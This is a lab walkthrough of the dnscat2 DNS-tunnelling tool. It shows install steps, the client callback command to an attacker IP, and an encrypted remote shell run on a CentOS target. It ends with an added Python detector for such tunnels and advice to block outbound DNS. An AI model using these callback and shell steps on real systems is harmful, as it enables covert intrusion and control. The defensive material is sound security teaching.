I. dnscat2
Attacker machine (Kali): 192.168.137.134
Target machine (CentOS): 192.168.137.130
1. Download and install dnscat2 on the attacker machine
$ sudo git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install
2. On the attacker machine, run: ruby ./dnscat2.rb --secret=123456
┌──(kali㉿kali)-[/home/dnscat2/server]
└─$ ruby ./dnscat2.rb --secret=123456
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...
It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=123456
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
dnscat2>
3. Download and build the dnscat2 client on the target machine
]# git clone https://github.com/iagox86/dnscat2.git
]# cd dnscat2/client/
]# make
4. On the target machine, run: ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
./dnscat --dns server=<attacker IP>,port=<attacker port, default 53> --secret=<pre-shared secret>
[root@localhost client]# ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 192.168.137.134
** Peer verified with pre-shared secret!
Session established!
5. Use the DNS tunnel from the attacker machine
dnscat2> help
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (localhost.localdomain) [encrypted and verified]
2 :: sh (localhost.localdomain) [encrypted and verified] [*]
3 :: sh (localhost.localdomain) [encrypted and verified] [*]
4 :: sh (localhost.localdomain) [encrypted and verified] [*]
5 :: sh (localhost.localdomain) [encrypted and verified] [*]
dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
New window created: 3
New window created: 4
New window created: 5
sh (localhost.localdomain) 2> ifconfig
sh (localhost.localdomain) 2> ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.137.130 netmask 255.255.255.0 broadcast 192.168.137.255
inet6 fe80::a751:4e08:5cfc:30d5 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:a9:45:54 txqueuelen 1000 (Ethernet)
RX packets 52871 bytes 44202390 (42.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23252 bytes 4082125 (3.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 276 bytes 24689 (24.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 276 bytes 24689 (24.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:27:81:06 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
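For the defender's side of this lab, here is an added detection example, not code from the original page or from the dnscat2 project: it scans a constructed DNS query log for the traits the session above exposes, namely queries sent straight to a host that is not the sanctioned resolver (the server itself warns that direct queries are less stealthy), the TXT/CNAME/MX record types the client advertised, and long hex-encoded labels. The log format, the sanctioned resolver address and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample DNS query log (not from the original page).
# Fields: time, client, server:port, qtype, qname.
SAMPLE_LOG = """\
10:00:01 192.168.137.130 192.168.137.134:53 TXT 3a7f0c1e9b2d44a1c0de3f5a6b7c8d9e.0f1a2b3c4d5e6f708192a3b4c5d6e7f8
10:00:01 192.168.137.130 192.168.137.134:53 CNAME 5b8e1d2f0a3c4e6f7081a2b3c4d5e6f7.8a9b0c1d2e3f4a5b
10:00:02 192.168.137.130 192.168.137.134:53 MX 6c9f2e3a1b4d5f7a8091b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8091a2b3c4
10:00:02 192.168.137.131 192.168.137.1:53 A www.example.com
10:00:03 192.168.137.131 192.168.137.1:53 AAAA mail.example.com
10:00:03 192.168.137.130 192.168.137.134:53 TXT 7d0a3f4b2c5e6a8b9102c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f
"""

SANCTIONED_RESOLVERS = {"192.168.137.1"}   # assumption: the only resolver clients may use
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}     # the record types the dnscat2 client advertised
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")  # a DNS label is at most 63 bytes

def is_hex_encoded(qname):
    """True when every label is a long hex string, the shape of a dnscat2 direct query."""
    return all(HEX_LABEL.match(label) for label in qname.lower().split("."))

def query_indicators(server, qtype, qname):
    """Return the list of tunnel indicators that a single query trips."""
    hits = []
    if server.split(":")[0] not in SANCTIONED_RESOLVERS:
        hits.append("resolver bypass")       # DNS sent straight to a non-resolver host
    if qtype in TUNNEL_QTYPES:
        hits.append(f"tunnel-friendly qtype {qtype}")
    if is_hex_encoded(qname):
        hits.append("hex-encoded labels")
    if len(qname) > 50:
        hits.append("long qname")
    return hits

def find_tunnel_clients(log_text, min_indicators=3, min_queries=3):
    """Map client IP -> count of suspicious queries, for clients over the threshold."""
    suspicious = defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                          # skip blank or malformed lines
        _, client, server, qtype, qname = parts
        if len(query_indicators(server, qtype, qname)) >= min_indicators:
            suspicious[client] += 1
    return {c: n for c, n in suspicious.items() if n >= min_queries}

if __name__ == "__main__":
    for client, count in find_tunnel_clients(SAMPLE_LOG).items():
        print(f"{client}: {count} tunnel-like DNS queries")
```

Running it flags 192.168.137.130, the target in this lab, while the host talking to the sanctioned resolver with ordinary A/AAAA lookups stays clean; in production the same indicators are cheaper to enforce by blocking outbound UDP/TCP 53 to anything but the internal resolver.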